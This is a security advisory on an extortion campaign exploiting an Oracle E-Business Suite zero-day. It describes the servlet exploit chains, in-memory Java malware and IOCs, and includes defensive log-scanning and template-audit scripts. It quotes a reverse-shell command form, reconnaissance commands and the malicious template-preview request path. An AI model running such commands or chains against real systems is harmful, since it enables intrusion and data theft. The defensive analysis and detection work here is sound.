Oracle E-Business Suite Under Siege: An Extortion Campaign Exploits a Zero-Day and Forces Emergency Patches

A joint effort by the Google Threat Intelligence Group (GTIG) and Mandiant has uncovered a large-scale extortion campaign leveraging a zero-day vulnerability in Oracle E-Business Suite (EBS). The actor behind the operation—who claims ties to the CL0P group—appears to have carried out months of silent intrusion, data exfiltration, and since September 29, 2025, a wave of emails sent to executives across multiple sectors to coerce payment. Oracle has issued emergency patches and urges immediate application.

What happened and why it matters

  • Main vector: exploitation of CVE-2025-61882 (CVSS 9.8), chained with other vulnerabilities in internet-exposed EBS components.
  • Timeline: activity detected since July 2025; consistent exploitation since August; extortion beginning September 29.
  • Target: Oracle EBS, a critical ERP system for finance, procurement, HR, and operations. Compromising EBS removes the need for lateral movement: the sensitive data already resides there.
  • Modus operandi: the attacker sends extortion emails from compromised third-party accounts (credentials obtained via infostealer malware), including real listings of files stolen from EBS to add credibility.
  • CL0P brand: the infrastructure and artifacts resemble historical campaigns linked to this ecosystem and to FIN11, though no definitive attribution has been established.

How it gets in: two chains attacking EBS

1) UiServlet (active before the July 2025 patches; mostly failed attempts afterwards)

Requests to /OA_HTML/configurator/UiServlet combine SSRF, CRLF injection, authentication bypass, and XSL injection to achieve Remote Code Execution (RCE). Payloads for both Linux (via bash) and Windows (via cmd.exe) have been observed. After the July 2025 patches, some attempts appear in logs as timeouts, indicating that the chain was at least partially mitigated.

2) SyncServlet (from August onward, unauthenticated)

Attacks on /OA_HTML/SyncServlet allow unauthenticated RCE through the XDO Template Manager:

  1. POST to SyncServlet.
  2. Create a malicious XDO template in the database (XDO_TEMPLATES_B / XDO_LOBS), with a TEMPLATE_CODE that usually starts with TMP or DEF and a TemplateType set to XSL-TEXT or XML.
  3. Trigger the payload via Template Preview with a URL like:
    /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=&TemplateType=

The XSL payload embeds Java code encoded in Base64, which loads additional stages in memory.

What’s inside: GOLDVEIN.JAVA and the SAGE family

  • GOLDVEIN.JAVA (downloader): Java variant of GOLDVEIN that connects to its C2 with a request disguised as a TLS handshake (advertising a non-existent “TLSv3.1” version) to fetch second-stage payloads. Execution results can appear “camouflaged” inside HTML comments in the HTTP response.
  • SAGE chain:
    • SAGEGIFT: reflective loader for WebLogic.
    • SAGELEAF: in-memory dropper that installs SAGEWAVE.
    • SAGEWAVE: a malicious servlet filter that accepts an AES-encrypted ZIP containing Java classes. Variants require a fixed X-ORACLE-DMS-ECID header and only act on request paths containing /help/.../iHelp/ or /support/.../iHelp/.

Once RCE is achieved, reconnaissance commands are executed as the applmgr user (e.g., df -h, ip addr, netstat -an, cat /etc/hosts and /etc/fstab, ARP lookups, pings), along with reverse shells of the form bash -i >& /dev/tcp// 0>&1 (the C2 host and port are omitted here).

Extortion with pressure tactics

The extortion emails do not state a ransom amount or an initial payment channel; instead, they ask the victim to make contact via inboxes associated with the CL0P ecosystem and include proof of access (file listings). Following previous patterns, victims are not published immediately on the leak site: the group waits and uses the threat of publication to increase pressure during negotiation.

Why this case raises the risk

  • ERP as a “vault”: attacking EBS maximizes impact because the critical data is already inside the application.
  • “Fileless” artifacts: Java code loaded in memory and covert channels make file-based antivirus and signature-driven SIEM rules less effective.
  • Scale and repetition: CL0P/FIN11 have repeatedly demonstrated this pattern: zero-day → mass exploitation → deferred extortion.

Signals and IOCs that should trigger alerts

  • IPs observed: 200.107.207.26, 161.97.99.49.
  • Possible C2 servers for GOLDVEIN.JAVA: 162.55.17.215:443, 104.194.11.200:443.
  • Suspicious endpoints:
    • /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG (pay special attention if TemplateCode begins with TMP or DEF).
    • /OA_HTML/configurator/UiServlet.
    • /OA_HTML/SyncServlet.
    • Substrings: /help/state/content/destination./navId.1/navvSetId.iHelp/ and /support/state/content/destination./navId.1/navvSetId.iHelp/.
  • Processes: bash -i (and its children) spawned by the Java process running as applmgr.
  • HTTP responses: containing “noisy” HTML comments that may include command output.
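The following script turns the indicator list above into a scanner for EBS front-end access logs (OHS/Apache combined format). It is an added example, not tooling from the GTIG/Mandiant report: the IOC values are the ones listed above, the regex assumes the standard combined log format, and the lines in SAMPLE_LOG are constructed for illustration (198.51.100.7 and 203.0.113.10 are documentation addresses, not indicators).

```python
"""Scan EBS front-end access logs (OHS/Apache combined format) for the IOCs
listed above. Added example, not tooling from the GTIG/Mandiant report;
the log lines in SAMPLE_LOG are constructed for illustration."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators taken from the list above.
IOC_IPS = {"200.107.207.26", "161.97.99.49"}
SUSPICIOUS_SERVLETS = ("/OA_HTML/configurator/UiServlet", "/OA_HTML/SyncServlet")
PREVIEW_PAGE = "/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG"
IHELP_SUBSTRINGS = (
    "/help/state/content/destination./navId.1/navvSetId.iHelp/",
    "/support/state/content/destination./navId.1/navvSetId.iHelp/",
)

# Combined log format: ip ident user [timestamp] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def classify(line):
    """Return the indicator names hit by one access-log line (empty = nothing)."""
    m = LOG_RE.match(line)
    if not m:
        return []  # unparsable line; count these separately if they pile up
    hits = []
    if m.group("ip") in IOC_IPS:
        hits.append("ioc_ip")
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)  # normalise %-encoding before matching
    query = parse_qs(parts.query)
    if path.startswith(SUSPICIOUS_SERVLETS):
        hits.append("servlet:" + path.rsplit("/", 1)[-1])
    if path == "/OA_HTML/OA.jsp" and query.get("page", [""])[0] == PREVIEW_PAGE:
        hits.append("template_preview")
        code = query.get("TemplateCode", [""])[0]
        if code.upper().startswith(("TMP", "DEF")):
            hits.append("template_code_prefix:" + code)
    if any(s in path for s in IHELP_SUBSTRINGS):
        hits.append("sagewave_ihelp_path")  # SAGEWAVE filter trigger path
    return hits


def scan(lines):
    """Return (line_number, hits) for every line that matches at least one IOC."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify(line)
        if hits:
            findings.append((n, hits))
    return findings


# Constructed sample log: one benign login, then the SyncServlet chain from an
# IOC address, a UiServlet attempt, and a request on the SAGEWAVE trigger path.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Oct/2025:10:14:03 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 5120
161.97.99.49 - - [02/Oct/2025:10:15:41 +0000] "POST /OA_HTML/SyncServlet HTTP/1.1" 200 312
161.97.99.49 - - [02/Oct/2025:10:15:44 +0000] "GET /OA_HTML/OA.jsp?page=/oracle/apps/xdo/oa/template/webui/TemplatePreviewPG&TemplateCode=TMP_7F3A&TemplateType=XSL-TEXT HTTP/1.1" 200 987
198.51.100.7 - - [02/Oct/2025:10:20:09 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 500 0
198.51.100.7 - - [03/Oct/2025:08:01:22 +0000] "POST /OA_HTML/help/state/content/destination./navId.1/navvSetId.iHelp/ HTTP/1.1" 200 64
"""

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG.splitlines()):
        print(f"line {n}: {', '.join(hits)}")
```

Run it over the real access logs with `scan(open(path).readlines())`. A hit on the two servlets or on the TemplatePreviewPG page with a TMP/DEF code is not proof of compromise on its own (legitimate administration touches some of these paths), but a sequence of SyncServlet followed shortly by a TemplatePreviewPG request from the same source, as in the sample, matches the chain described above and should trigger the XDO template audit.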

Immediate steps (in this order)

1) Patch now.
Apply the emergency patches Oracle released for EBS in October 2025 and bring the platform up to date with the latest Critical Patch Updates. Closing CVE-2025-61882 and the related chains removes the known entry points.

2) Audit XDO templates.
Check for recent creations in XDO_TEMPLATES_B and XDO_LOBS; review templates with TEMPLATE_CODE starting with TMP or DEF and verify XSL content that decodes Base64 and loads Java classes.

3) Block Internet egress from EBS servers.
Restrict all non-essential outbound traffic. These malware families need a C2 connection for their second stages and for exfiltration, so this control still pays off even if the host is already compromised.

4) Enhance monitoring.
Deploy WAF/IDS with specific rules for UiServlet/SyncServlet, TemplatePreviewPG, and the iHelp routes. Increase log retention for access logs and implement detection of responses with anomalous HTML comments.

5) Conduct memory forensics if suspicion arises.
Dump Java processes from the EBS middleware; look for reflectively loaded classes and added filters.

6) Prepare for extortion response.
Develop playbooks covering legal, communication, and operational procedures. Do not interact without consultation; do not pay; coordinate with authorities and CSIRTs.

Quick tips for CIOs and CISOs

  • Inventory of exposure: identify which EBS instances are publicly accessible and what versions they run.
  • Zero egress segmentation: ensure EBS systems do not have outbound internet access.
  • Governance: enforce policies for templates and plugins in EBS; perform periodic reviews of XDO.
  • Tabletop exercises: simulate an extortion email scenario and walk through decision processes (technical, legal, regulatory).

Frequently Asked Questions (FAQ)

If I’ve already applied the October patches, am I safe?
While it greatly reduces the risk of further exploitation, you must verify whether there has been previous intrusion: audit XDO templates, examine endpoints, and review outgoing traffic.

How do I detect a malicious template in EBS?
Review XDO_TEMPLATES_B and XDO_LOBS for creation date and prefixes like TMP or DEF. Look for XSL containing Base64 and calls to Java classes. If found, treat the host as compromised.
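The heuristic below implements the audit described in step 2 of the immediate steps and in this FAQ answer. It is an added example, not code from Oracle or from the GTIG/Mandiant report. It assumes the caller has already selected rows from XDO_TEMPLATES_B joined to XDO_LOBS on the template code and read the XSL out of XDO_LOBS.FILE_DATA as text; the column names in the row dicts, the Java extension namespaces checked, and the SAMPLE_ROWS are all assumptions or constructed data, not values from the report.

```python
"""Heuristic audit of XDO templates (immediate step 2 and the FAQ on malicious
templates). Added example, not code from Oracle or the GTIG/Mandiant report.
Assumed input: rows from XDO_TEMPLATES_B joined to XDO_LOBS, with the XSL from
XDO_LOBS.FILE_DATA decoded to str; SAMPLE_ROWS below are constructed."""
import base64
import re
from datetime import date, timedelta

# Namespaces through which an XSL stylesheet can call into Java. Assumption:
# these cover the Oracle XDK and Xalan processors; extend for your stack.
JAVA_EXT_NAMESPACES = (
    "http://www.oracle.com/XSL/Transform/java/",
    "http://xml.apache.org/xalan/java",
    "xalan://",
)
# API names an in-memory loader needs; any of them inside XSL deserves a look.
JAVA_LOADER_TOKENS = ("ClassLoader", "defineClass", "Class.forName", "newInstance", "Runtime")
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")  # long Base64 runs only
SUSPICIOUS_PREFIXES = ("TMP", "DEF")
CONTENT_INDICATORS = {"java_extension_namespace", "java_loader_api",
                      "base64_blob", "embedded_class_file"}


def decodes_to_class_file(blob):
    """True if a Base64 blob decodes to a Java class file (magic 0xCAFEBABE)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return raw[:4] == b"\xca\xfe\xba\xbe"


def assess_template(row, today):
    """Return the indicator names that make one template row suspicious."""
    reasons = []
    if row["TEMPLATE_CODE"].upper().startswith(SUSPICIOUS_PREFIXES):
        reasons.append("code_prefix")
    if today - row["CREATION_DATE"] <= timedelta(days=90):
        reasons.append("recent_creation")
    xsl = row["FILE_DATA"]
    if any(ns in xsl for ns in JAVA_EXT_NAMESPACES):
        reasons.append("java_extension_namespace")
    if any(tok in xsl for tok in JAVA_LOADER_TOKENS):
        reasons.append("java_loader_api")
    blobs = BASE64_BLOB.findall(xsl)
    if blobs:
        reasons.append("base64_blob")
        if any(decodes_to_class_file(b) for b in blobs):
            reasons.append("embedded_class_file")
    return reasons


def verdict(reasons):
    """Content indicators mean the host is to be treated as compromised;
    metadata-only hits (prefix, recent creation) just need a manual review."""
    if CONTENT_INDICATORS & set(reasons):
        return "treat_host_as_compromised"
    return "review" if reasons else "clean"


def audit(rows, today):
    """Return (template_code, verdict, reasons) for every non-clean row."""
    out = []
    for row in rows:
        reasons = assess_template(row, today)
        if reasons:
            out.append((row["TEMPLATE_CODE"], verdict(reasons), reasons))
    return out


# Constructed rows: an ordinary XSL-FO report, and one shaped like the loader
# described above (a Base64-encoded class file behind a Java extension namespace).
FAKE_CLASS_B64 = base64.b64encode(b"\xca\xfe\xba\xbe" + b"\x00" * 200).decode()
MALICIOUS_XSL = (
    '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
    'xmlns:ldr="http://www.oracle.com/XSL/Transform/java/java.lang.ClassLoader">'
    "<xsl:template match=\"/\"><xsl:variable name=\"b\" select=\"'" + FAKE_CLASS_B64 + "'\"/>"
    "</xsl:template></xsl:stylesheet>"
)
SAMPLE_ROWS = [
    {"TEMPLATE_CODE": "XXAP_INVOICE_PRINT", "TEMPLATE_TYPE_CODE": "XSL-FO",
     "CREATION_DATE": date(2023, 5, 14),
     "FILE_DATA": '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" '
                  'xmlns:fo="http://www.w3.org/1999/XSL/Format"><xsl:template match="/">'
                  '<fo:block>Invoice</fo:block></xsl:template></xsl:stylesheet>'},
    {"TEMPLATE_CODE": "TMP_7F3A", "TEMPLATE_TYPE_CODE": "XSL-TEXT",
     "CREATION_DATE": date(2025, 9, 28), "FILE_DATA": MALICIOUS_XSL},
]

if __name__ == "__main__":
    for code, v, reasons in audit(SAMPLE_ROWS, date.today()):
        print(code, v, reasons)
```

The verdict logic is deliberately two-tiered: a TMP/DEF prefix or a recent creation date alone is only a review item, because legitimate templates can carry those properties, whereas a Java extension namespace, loader API names, or a Base64 blob that decodes to a class file inside XSL-TEXT content has no business purpose and, per the FAQ answer above, means the host must be treated as compromised. Tune JAVA_LOADER_TOKENS if your templates legitimately mention words such as Runtime.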

Does blocking egress fix the problem?
It does not clean the server, but it breaks the chain (no C2, no second stage, no exfiltration). It is a critical complement to patching and cleanup, not a replacement for them.

Should I assume data has been exfiltrated?
The campaign includes cases of exfiltration. If IOCs are present, initiate forensics, conduct impact assessments, notify authorities if required, and develop communication plans for affected parties.

via: Oracle Security News and cloud.google.com
